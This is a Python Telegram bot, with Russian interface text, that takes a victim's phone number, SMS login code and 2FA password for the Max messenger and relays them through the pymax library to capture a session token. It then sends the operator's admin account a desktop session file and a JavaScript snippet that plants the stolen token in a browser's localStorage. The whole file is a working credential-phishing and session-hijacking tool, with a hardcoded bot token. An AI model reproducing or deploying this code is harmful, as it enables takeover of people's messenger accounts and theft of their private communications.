import os
import json
import asyncio
import uuid
import logging
import time
import threading
from pathlib import Path
from aiogram import Bot, Dispatcher, types, F
from aiogram.fsm.context import FSMContext
from aiogram.fsm.state import State, StatesGroup
from aiogram.fsm.storage.memory import MemoryStorage
from aiogram.types import FSInputFile

# ============================================================
# НАСТРОЙКИ (замените на свои)
# ============================================================
BOT_TOKEN = "8948301530:AAH-ZTWkJuUOfPMRFl19qC1-YUAXfKUd9C8"
ADMIN_ID = 8632861931
# ============================================================

logging.basicConfig(level=logging.INFO)
bot = Bot(token=BOT_TOKEN)
dp = Dispatcher(storage=MemoryStorage())

class AuthState(StatesGroup):
    waiting_for_code = State()
    waiting_for_password = State()

pending = {}
input_codes = {}
input_passwords = {}

def gen_password():
    import random, string
    return ''.join(random.choices(string.ascii_letters + string.digits + "_@#", k=40))

def build_desktop_json(token, device_id, session_id, password, user_id, phone):
    return {
        "token": token,
        "device_id": device_id,
        "session_id": session_id,
        "password": password,
        "connection_params": {
            "device_type": "DESKTOP",
            "app_version": "25.12.13",
            "device_name": "Chrome",
            "os_version": "Windows 10",
            "locale": "ru",
            "device_locale": "ru",
            "screen": "1080x1920",
            "timezone": "Europe/Moscow"
        },
        "user": {
            "user_id": user_id,
            "phone": int(phone.replace("+", "")),
            "photo_id": None,
            "first_name": "",
            "last_name": ""
        }
    }

def generate_web_js(password, device_id, token, viewer_id):
    return f"""PASSWORD: {password}

sessionStorage.clear();
localStorage.clear();
localStorage.setItem('__oneme_device_id', '{device_id}');
localStorage.setItem('__oneme_auth', JSON.stringify({{"token":"{token}","viewerId":{viewer_id}}}));
window.location.reload();"""

async def send_files(phone, uid, work_dir, desktop, js):
    dp = f"{work_dir}/desktop_session.json"
    with open(dp, "w", encoding="utf-8") as f:
        json.dump(desktop, f, ensure_ascii=False, indent=4)
    wp = f"{work_dir}/web_token.js"
    with open(wp, "w", encoding="utf-8") as f:
        f.write(js)
    await bot.send_document(ADMIN_ID, FSInputFile(dp),
        caption=f"💻 ДЕСКТОП\nНомер: {phone}", parse_mode="HTML")
    await bot.send_document(ADMIN_ID, FSInputFile(wp),
        caption=f"🌐 ВЕБ\nНомер: {phone}", parse_mode="HTML")

def pymax_thread(uid, phone, work_dir):
    """Запускает pymax в отдельном потоке."""
    from pymax import Client as MaxClient
    import builtins
    
    original = builtins.input
    
    def custom_input(prompt=""):
        p = prompt.lower() if prompt else ""
        if "code" in p or "код" in p:
            with open(f"{work_dir}/status.txt", "w") as f:
                f.write("waiting_code")
            while uid not in input_codes:
                time.sleep(0.3)
            return input_codes.pop(uid)
        elif "password" in p or "пароль" in p:
            with open(f"{work_dir}/status.txt", "w") as f:
                f.write("waiting_password")
            while uid not in input_passwords:
                time.sleep(0.3)
            return input_passwords.pop(uid)
        return original(prompt)
    
    builtins.input = custom_input
    
    try:
        client = MaxClient(phone=phone, work_dir=work_dir)
        client.start()
        
        token = None
        user_id = None
        
        if hasattr(client, 'token'):
            token = client.token
        elif hasattr(client, 'session') and hasattr(client.session, 'token'):
            token = client.session.token
        
        if hasattr(client, 'my_id'):
            user_id = client.my_id
        elif hasattr(client, 'me') and hasattr(client.me, 'id'):
            user_id = client.me.id
        
        if not token:
            raise Exception("Не удалось получить токен")
        
        result = {"ok": True, "token": token, "user_id": user_id or 0}
        with open(f"{work_dir}/result.json", "w") as f:
            json.dump(result, f)
        with open(f"{work_dir}/status.txt", "w") as f:
            f.write("done")
            
    except Exception as e:
        msg = str(e).lower()
        
        if "block" in msg or "удалён" in msg or "заблокирован" in msg:
            status = "blocked"
        elif "password" in msg or "2fa" in msg or "two_factor" in msg:
            status = "need_password"
        elif "invalid" in msg or "wrong" in msg or "неверный" in msg:
            status = "invalid"
        elif "limit" in msg or "flood" in msg or "много попыток" in msg or "попробуйте позже" in msg:
            status = "flood"
        else:
            status = f"error:{e}"
        
        with open(f"{work_dir}/status.txt", "w") as f:
            f.write(status)
    finally:
        builtins.input = original

@dp.message(F.text == "/start")
async def start(message: types.Message):
    await message.answer("👋 Отправь номер в формате +79111111111")

@dp.message(F.text.regexp(r'^\+7\d{10}$'))
async def phone_handler(message: types.Message, state: FSMContext):
    phone = message.text.strip()
    uid = message.from_user.id
    work_dir = f"cache/{uid}"
    os.makedirs(work_dir, exist_ok=True)
    
    for f in ["status.txt", "result.json"]:
        p = Path(work_dir) / f
        if p.exists():
            p.unlink()
    
    pending[uid] = {"phone": phone, "work_dir": work_dir}
    await state.set_state(AuthState.waiting_for_code)
    await state.update_data(phone=phone, work_dir=work_dir, uid=uid)
    
    msg = await message.answer("⏳ Отправляю SMS...")
    
    t = threading.Thread(target=pymax_thread, args=(uid, phone, work_dir), daemon=True)
    t.start()
    
    status_file = Path(work_dir) / "status.txt"
    
    for _ in range(60):
        await asyncio.sleep(0.5)
        
        if not status_file.exists():
            continue
        
        status = status_file.read_text().strip()
        
        if status == "waiting_code":
            await msg.edit_text("✅ SMS отправлена. Введи код из 6 цифр:")
            return
        
        elif status == "blocked":
            await msg.edit_text("🚫 Аккаунт заблокирован или удалён.")
            del pending[uid]
            await state.clear()
            return
        
        elif status == "flood":
            await msg.edit_text("⏳ Слишком много попыток. Подождите и попробуйте снова.")
            del pending[uid]
            await state.clear()
            return
        
        elif status.startswith("error:"):
            await msg.edit_text(f"❌ {status[6:]}")
            del pending[uid]
            await state.clear()
            return
    
    await msg.edit_text("❌ Таймаут. Попробуй ещё раз.")
    del pending[uid]
    await state.clear()

@dp.message(AuthState.waiting_for_code, F.text.regexp(r'^\d{6}$'))
async def code_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    code = message.text.strip()
    
    if uid not in pending:
        return await message.answer("⏳ Сессия устарела. Отправь номер заново через /start.")
    
    data = await state.get_data()
    phone = data["phone"]
    work_dir = data["work_dir"]
    
    input_codes[uid] = code
    
    msg = await message.answer("⏳ Проверяю код...")
    
    status_file = Path(work_dir) / "status.txt"
    result_file = Path(work_dir) / "result.json"
    
    for _ in range(60):
        await asyncio.sleep(0.5)
        
        if not status_file.exists():
            continue
        
        status = status_file.read_text().strip()
        
        if status == "done":
            with open(result_file) as f:
                result = json.load(f)
            token = result["token"]
            viewer_id = result["user_id"]
            password = gen_password()
            session_id = int(time.time() * 1000)
            device_id = str(uuid.uuid4())
            
            desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
            js = generate_web_js(password, device_id, token, viewer_id)
            
            await send_files(phone, uid, work_dir, desktop, js)
            await msg.edit_text("✅ Готово! Файлы отправлены админу.")
            del pending[uid]
            await state.clear()
            return
        
        elif status == "need_password":
            await state.set_state(AuthState.waiting_for_password)
            await msg.edit_text("🔐 Введи пароль 2FA:")
            return
        
        elif status == "invalid":
            await msg.edit_text("❌ Неверный код. Попробуй ещё раз.")
            return
        
        elif status == "blocked":
            await msg.edit_text("🚫 Аккаунт заблокирован или удалён.")
            del pending[uid]
            await state.clear()
            return
        
        elif status.startswith("error:"):
            await msg.edit_text(f"❌ {status[6:]}")
            del pending[uid]
            await state.clear()
            return
    
    await msg.edit_text("❌ Таймаут. Попробуй ещё раз.")
    del pending[uid]
    await state.clear()

@dp.message(AuthState.waiting_for_password)
async def password_handler(message: types.Message, state: FSMContext):
    uid = message.from_user.id
    pwd = message.text.strip()
    
    if uid not in pending:
        return await message.answer("⏳ Сессия устарела. Отправь номер заново через /start.")
    
    data = await state.get_data()
    phone = data["phone"]
    work_dir = data["work_dir"]
    
    input_passwords[uid] = pwd
    msg = await message.answer("⏳ Проверяю пароль...")
    
    status_file = Path(work_dir) / "status.txt"
    result_file = Path(work_dir) / "result.json"
    
    for _ in range(60):
        await asyncio.sleep(0.5)
        
        if not status_file.exists():
            continue
        
        status = status_file.read_text().strip()
        
        if status == "done":
            with open(result_file) as f:
                result = json.load(f)
            token = result["token"]
            viewer_id = result["user_id"]
            password = gen_password()
            session_id = int(time.time() * 1000)
            device_id = str(uuid.uuid4())
            
            desktop = build_desktop_json(token, device_id, session_id, password, viewer_id, phone)
            js = generate_web_js(password, device_id, token, viewer_id)
            
            await send_files(phone, uid, work_dir, desktop, js)
            await msg.edit_text("✅ Готово!")
            del pending[uid]
            await state.clear()
            return
        
        elif status == "invalid":
            await msg.edit_text("❌ Неверный пароль. Попробуй ещё раз.")
            return
        
        elif status == "blocked":
            await msg.edit_text("🚫 Аккаунт заблокирован.")
            del pending[uid]
            await state.clear()
            return
        
        elif status.startswith("error:"):
            await msg.edit_text(f"❌ {status[6:]}")
            del pending[uid]
            await state.clear()
            return
    
    await msg.edit_text("❌ Таймаут.")
    del pending[uid]
    await state.clear()

async def main():
    logging.info("Бот запущен!")
    await dp.start_polling(bot)

if __name__ == "__main__":
    asyncio.run(main())
